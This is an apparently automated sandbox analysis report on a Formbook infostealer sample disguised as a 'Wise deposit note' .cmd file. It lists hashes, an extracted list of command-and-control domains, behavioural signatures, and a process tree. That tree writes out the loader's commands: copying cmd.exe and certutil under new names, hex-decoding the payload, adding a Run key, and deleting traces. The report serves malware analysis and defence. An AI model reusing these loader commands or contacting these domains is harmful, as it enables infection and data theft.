Analysis
-
max time kernel
149s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 17:13
Static task
static1
Behavioral task
behavioral1
Sample
wise_deposit_note__1114218690__3287491072__en.cmd
Resource
win7-20240508-en
General
-
Target
wise_deposit_note__1114218690__3287491072__en.cmd
-
Size
2.4MB
-
MD5
42323f7609e2e5c56add77d01e27432f
-
SHA1
e5262c46781a8c58aaee00a529ed7597dbb2b698
-
SHA256
4cb31951ae2b4f8b86b532c25762252f28525f55061d8d09a356a9c8f12029b2
-
SHA512
0814feee3013a4409c3171f30dc9d9d4ffe5626e6ba28a257163fa8f26380751fbd5ba7077e47e9bcd59d8b852b50822fb3383c9a6366b8619db7627d9ded44d
-
SSDEEP
24576:IPHN8ur54cKt8AdV30Z3ZRYwVxrhWHmmV/MBm54hRCKxBJxsv:IPHSur5M8Ar30JnrQLMEBv
Malware Config
Extracted
formbook
4.1
ca63
themaxrichth.online
lhzshb.com
isacarrceramics.online
duhochanquoc.website
apexmedia.pro
33311.pro
x2mjbu8gg.shop
dashcreative.online
nifle.shop
hora.lol
rclrwa.asia
aviation-training-sqj.top
a9659a62.vip
uspgh.work
hhol5.top
jinkaida-cn.cn
watchwedding.com
728ym.lat
gillieron.swiss
bingsne.online
professionaljournalism.com
senior-living-15150.bond
chatsio.com
dr-jordan.site
sador.xyz
nagaways.online
552357.pro
domainupdate.site
3v5u21668.shop
dh76044.vip
cineflickapp.online
ht31a.vip
workingcat.online
9h6db.shop
evallc.net
sun20win.digital
683ym.lat
retrosystem.fun
bgkamil.xyz
androidmobiledk.today
gsptx.online
onlineit.sbs
violetnuit.shop
kyusgwh2.top
vdqgj.asia
helpmepeas.net
4399game.asia
tent-homes-10133.bond
moki.dev
raildriver.net
lkjuy.xyz
presentdadsmatter.shop
amp-kopi77i2.xyz
cyber-security-onli.bond
rtpcmbet27.xyz
80lrlaenant8.life
urostatingr.shop
xn--fiq73f39fx0y2hq.work
zc041.xyz
34-health.shop
yunhaicm.asia
domain-2.buzz
money1lifecoachingservice.net
5301ulovp.website
siasstudios.com
Signatures
-
Formbook payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2264-59-0x00000000031B0000-0x00000000041B0000-memory.dmp formbook behavioral1/memory/2264-62-0x00000000031B0000-0x00000000041B0000-memory.dmp formbook behavioral1/memory/1900-65-0x0000000000080000-0x00000000000AF000-memory.dmp formbook -
Executes dropped EXE 9 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeAudio.pifalpha.exealpha.exeyrblzjxP.pifpid process 1984 alpha.exe 2456 alpha.exe 2492 kn.exe 2512 alpha.exe 2568 kn.exe 2768 Audio.pif 2488 alpha.exe 2480 alpha.exe 2844 yrblzjxP.pif -
Loads dropped DLL 15 IoCs
Processes:
cmd.exealpha.exealpha.exeAudio.pifWerFault.exepid process 1700 cmd.exe 1700 cmd.exe 2456 alpha.exe 1700 cmd.exe 2512 alpha.exe 1700 cmd.exe 1700 cmd.exe 2768 Audio.pif 2768 Audio.pif 1008 WerFault.exe 1008 WerFault.exe 1008 WerFault.exe 1008 WerFault.exe 1008 WerFault.exe 1008 WerFault.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Audio.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Pxjzlbry = "C:\\Users\\Public\\Pxjzlbry.url" Audio.pif -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Audio.pifcolorcpl.exenetsh.exedescription pid process target process PID 2768 set thread context of 2844 2768 Audio.pif yrblzjxP.pif PID 2264 set thread context of 1096 2264 colorcpl.exe Explorer.EXE PID 1900 set thread context of 1096 1900 netsh.exe Explorer.EXE -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1008 2844 WerFault.exe yrblzjxP.pif -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Audio.pifpid process 2768 Audio.pif -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
Audio.pifcolorcpl.exenetsh.exepid process 2768 Audio.pif 2264 colorcpl.exe 2264 colorcpl.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe 1900 netsh.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
colorcpl.exenetsh.exepid process 2264 colorcpl.exe 2264 colorcpl.exe 2264 colorcpl.exe 1900 netsh.exe 1900 netsh.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
colorcpl.exeExplorer.EXEnetsh.exedescription pid process Token: SeDebugPrivilege 2264 colorcpl.exe Token: SeShutdownPrivilege 1096 Explorer.EXE Token: SeDebugPrivilege 1900 netsh.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeAudio.pifyrblzjxP.pifExplorer.EXEnetsh.exedescription pid process target process PID 1700 wrote to memory of 2000 1700 cmd.exe extrac32.exe PID 1700 wrote to memory of 2000 1700 cmd.exe extrac32.exe PID 1700 wrote to memory of 2000 1700 cmd.exe extrac32.exe PID 1700 wrote to memory of 1984 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 1984 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 1984 1700 cmd.exe alpha.exe PID 1984 wrote to memory of 2860 1984 alpha.exe extrac32.exe PID 1984 wrote to memory of 2860 1984 alpha.exe extrac32.exe PID 1984 wrote to memory of 2860 1984 alpha.exe extrac32.exe PID 1700 wrote to memory of 2456 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2456 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2456 1700 cmd.exe alpha.exe PID 2456 wrote to memory of 2492 2456 alpha.exe kn.exe PID 2456 wrote to memory of 2492 2456 alpha.exe kn.exe PID 2456 wrote to memory of 2492 2456 alpha.exe kn.exe PID 1700 wrote to memory of 2512 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2512 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2512 1700 cmd.exe alpha.exe PID 2512 wrote to memory of 2568 2512 alpha.exe kn.exe PID 2512 wrote to memory of 2568 2512 alpha.exe kn.exe PID 2512 wrote to memory of 2568 2512 alpha.exe kn.exe PID 1700 wrote to memory of 2768 1700 cmd.exe Audio.pif PID 1700 wrote to memory of 2768 1700 cmd.exe Audio.pif PID 1700 wrote to memory of 2768 1700 cmd.exe Audio.pif PID 1700 wrote to memory of 2768 1700 cmd.exe Audio.pif PID 1700 wrote to memory of 2488 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2488 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2488 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2480 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2480 1700 cmd.exe alpha.exe PID 1700 wrote to memory of 2480 1700 cmd.exe alpha.exe PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2768 wrote to memory of 2844 2768 Audio.pif yrblzjxP.pif PID 2844 wrote to memory of 1008 2844 yrblzjxP.pif WerFault.exe PID 2844 wrote to memory of 1008 2844 yrblzjxP.pif WerFault.exe PID 2844 wrote to memory of 1008 2844 yrblzjxP.pif WerFault.exe PID 2844 wrote to memory of 1008 2844 yrblzjxP.pif WerFault.exe PID 2768 wrote to memory of 1768 2768 Audio.pif extrac32.exe PID 2768 wrote to memory of 1768 2768 Audio.pif extrac32.exe PID 2768 wrote to memory of 1768 2768 Audio.pif extrac32.exe PID 2768 wrote to memory of 1768 2768 Audio.pif extrac32.exe PID 2768 wrote to memory of 2264 2768 Audio.pif colorcpl.exe PID 2768 wrote to memory of 2264 2768 Audio.pif colorcpl.exe PID 2768 wrote to memory of 2264 2768 Audio.pif colorcpl.exe PID 2768 wrote to memory of 2264 2768 Audio.pif colorcpl.exe PID 2768 wrote to memory of 2264 2768 Audio.pif colorcpl.exe PID 1096 wrote to memory of 1900 1096 Explorer.EXE netsh.exe PID 1096 wrote to memory of 1900 1096 Explorer.EXE netsh.exe PID 1096 wrote to memory of 1900 1096 Explorer.EXE netsh.exe PID 1096 wrote to memory of 1900 1096 Explorer.EXE netsh.exe PID 1900 wrote to memory of 744 1900 netsh.exe cmd.exe PID 1900 wrote to memory of 744 1900 netsh.exe cmd.exe PID 1900 wrote to memory of 744 1900 netsh.exe cmd.exe PID 1900 wrote to memory of 744 1900 netsh.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 93⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\wise_deposit_note__1114218690__3287491072__en.cmd" "C:\\Users\\Public\\Audio.mp4" 94⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 123⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 124⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\Audio.pifC:\Users\Public\Libraries\Audio.pif3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Libraries\yrblzjxP.pifC:\Users\Public\Libraries\yrblzjxP.pif4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 365⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Pxjzlbry.PIF4⤵
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S3⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\SysWOW64\colorcpl.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Audio.mp4Filesize
1.7MB
MD519c1e12dd929495409539244b0ed93c7
SHA14cfa1823732b5b7357ddb1932d3b1547c7227619
SHA25626de6e62d11c5b463d2077c56f11c4bfddaa8e83200ab1facc29e478e15f11ff
SHA5126b09493e2a26f8aa43e2cf34ab5973b7ab28b6ab95ad014d767bb7b4f9bb541c12f013a53c42b9f8931a304105f7da486b51749c453021d234303336fd82a2b4
-
C:\Users\Public\Libraries\Audio.pifFilesize
890KB
MD5a0af268716f0954964b48a4ac5c44b08
SHA1f80f8c5083002d8e9484a45d21221e5c7f0160dc
SHA2568d49b42445b075555360a8809710d34bc35d8658ced4ed1a062b6d4c2e7be2e6
SHA5123f6588e1b76450cd72711b505ff81072f7055de76abcd5dab5bcc03d7a91b214422152f470ff8ffce73cbe8501e75dff6dd60371ebf7da7a6927741c09279692
-
C:\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
\Users\Public\Libraries\yrblzjxP.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
memory/1096-74-0x00000000077F0000-0x0000000007981000-memory.dmpFilesize
1.6MB
-
memory/1900-63-0x0000000001160000-0x000000000117B000-memory.dmpFilesize
108KB
-
memory/1900-65-0x0000000000080000-0x00000000000AF000-memory.dmpFilesize
188KB
-
memory/2264-59-0x00000000031B0000-0x00000000041B0000-memory.dmpFilesize
16.0MB
-
memory/2264-62-0x00000000031B0000-0x00000000041B0000-memory.dmpFilesize
16.0MB
-
memory/2768-34-0x0000000000400000-0x00000000004E7000-memory.dmpFilesize
924KB
-
memory/2844-44-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/2844-47-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB